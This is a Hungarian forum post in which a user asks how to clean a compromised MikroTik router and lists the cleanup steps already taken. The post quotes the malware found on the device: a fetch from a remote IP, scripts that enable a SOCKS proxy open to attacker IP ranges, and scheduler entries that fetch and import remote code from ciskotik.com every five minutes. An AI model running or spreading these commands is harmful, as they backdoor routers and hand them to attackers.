2. Fórumok
  3. Hálózat, szolgáltatók
  4. Mikrotik routerek
  • Téma összefoglaló
    Utoljára frissítve: 2025-08-03 17:27

    LOGOUT

    Mikrotik routerekkel foglalkozó téma. Mikrotik router típusok, hardverek, router beállítások, programozás (scriptek írása), frissítés, és minden Mikrotik routerrel kapcsolatos beszélgetés helye.

Új hozzászólás Aktív témák

  • #5686 A_ScHuLcZ addikt
    Új Válasz #5686
    Új hozzászólás
    Összes hozzászólása itt Válaszok az összes hozzászólására itt Válaszok erre a hozzászólásra
    Privát üzenet küldése

    A_ScHuLcZ

    addikt

    Sziasztok!

    Feltételezhetően feltört eszközt hogyan tudok megtisztítani? Belépéskor a log tele volt hibaüzenetekkel, és volt egy script, aminek a forrása ismeretlen.

    Log bejegyzés, ami ismétlődött:
    script error: expected end of command (line 3 column 86)

    A scriptben ez állt:
    /tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http

    A letöltött mikrotik.php fájlt töröltem, de azért letöltöttem pc-re, és belenéztem, ilyen bejegyzésekkel volt tele:
    /system scheduler remove [find name !="U3" && name !="U4"]
    /ip socks set enabled=yes port=44550
    { :local countRules [/ip socks access print count-only]; :for i from 0 to $countRules-1 step=1 do= {/ip socks access remove $i} }
    /ip socks access add src-address=5.188.42.224/29 action=allow
    /ip socks access add src-address=5.188.42.232/30 action=allow
    /ip socks access add src-address=5.188.42.236/31 action=allow
    /ip socks access add src-address=5.188.42.238/32 action=allow
    /ip socks access add src-address=5.188.42.96/29 action=allow
    /ip socks access add src-address=5.188.42.104/30 action=allow
    /ip socks access add src-address=5.188.42.108/31 action=allow
    /ip socks access add src-address=5.188.42.110/32 action=allow
    /ip socks access add src-address=5.189.235.80/30 action=allow
    /ip socks access add src-address=5.189.235.84/31 action=allow
    /ip socks access add src-address=5.189.235.86/32 action=allow
    /ip socks access add src-address=192.243.53.14/32 action=allow
    /ip socks access add src-address=192.243.53.15/32 action=allow
    /ip socks access add src-address=192.243.53.31/32 action=allow
    /ip socks access add src-address=46.20.39.117/32 action=allow
    /ip socks access add src-address=78.46.114.23/32 action=allow
    /ip socks access add src-address=213.202.230.152/32 action=allow
    /ip socks access add src-address=31.184.224.107/32 action=allow
    /ip socks access add src-address=31.184.224.108/32 action=allow
    /ip socks access add src-address=31.184.224.109/32 action=allow
    /ip socks access add src-address=5.188.42.109/32 action=allow
    /ip socks access add src-address=0.0.0.0/0 action=deny

    Eddig elvégzett műveletek:
    - idegen script és job törlése
    - winbox-on kívül minden service tiltása, winbox is kizárólag egy távoli ip-ről engedélyezve
    - ip socks kikapcsolása
    - user pw csere
    - fw és RouterOS frissítés 6.43-ra, majd reboot

    Már nem látok idegen scriptet, de a log-ban a fenti bejegyzés időnként továbbra is megjelenik. A mikrotik.php fájl időnként továbbra is letöltődik, továbbá 5 percenként egy 7xe7zt46hb08 nevű fájl is letöltődik, aminek a tartalma az alábbi:
    :do { /system scheduler set U3 name="U5" on-event="/tool fetch url=http://ciskotik.com/poll/4e57ce74-3959-441c-be72-2ead3b6d0e57 mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08" } on-error={ :put "U3 not found"}

    :do { /system scheduler set U4 name="U5" on-event="/tool fetch url=http://ciskotik.com/poll/4e57ce74-3959-441c-be72-2ead3b6d0e57 mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08" } on-error={ :put "U4 not found"}

    Mit tudok tenni? (nem látok se script-et, se job-ot, más módszerrel csinálja)

Új hozzászólás Aktív témák

Hirdetés